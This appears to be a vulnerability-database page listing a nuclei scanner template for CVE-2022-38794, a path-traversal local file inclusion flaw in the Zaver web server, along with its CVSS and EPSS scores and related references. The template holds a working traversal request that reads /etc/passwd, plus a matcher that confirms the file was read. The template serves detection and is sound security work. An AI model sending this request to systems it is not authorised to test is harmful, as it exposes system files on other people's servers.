Lucene search
K

Zaver - Local File Inclusion

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

Zaver is vulnerable to local file inclusion, risking unauthorized access and data leakage.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-38794
27 Aug 202221:15
attackerkb
Circl
CVE-2022-38794
28 Aug 202200:31
circl
CNNVD
Zaver 路径遍历漏洞
27 Aug 202200:00
cnnvd
CVE
CVE-2022-38794
27 Aug 202220:26
cve
Cvelist
CVE-2022-38794
27 Aug 202220:26
cvelist
NVD
CVE-2022-38794
27 Aug 202221:15
nvd
OpenVAS
Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check
18 Apr 201700:00
openvas
OSV
CVE-2022-38794
27 Aug 202221:15
osv
Prion
Directory traversal
27 Aug 202221:15
prion
Positive Technologies
PT-2022-24571 · Zaver · Zaver
27 Aug 202200:00
ptsecurity
Rows per page
id: CVE-2022-38794

info:
  name: Zaver - Local File Inclusion
  author: pikpikcu
  severity: high
  description: |
    Zaver through 2020-12-15  is vulnerable to local file inclusion via the GET /.. substring.
  impact: |
    This vulnerability can lead to unauthorized access, data leakage, and remote code execution.
  remediation: |
    To remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations.
  reference:
    - https://github.com/zyearn/zaver/issues/22
    - https://nvd.nist.gov/vuln/detail/CVE-2022-38794
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-38794
    cwe-id: CWE-22
    epss-score: 0.03599
    epss-percentile: 0.88058
    cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zaver_project
    product: zaver
  tags: cve,cve2022,lfi,zaver,zaver_project,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/../../../../../../../../etc/passwd'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c037c03558849dfe8676497bb68e8f9f164a1fb9b6e4b4e6308afb7aa0bc04e902204bee59358f6e9849eb0fbefd02cffdaa025b52f54e27e416e3297c4be99d857a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.5
EPSS0.03599
30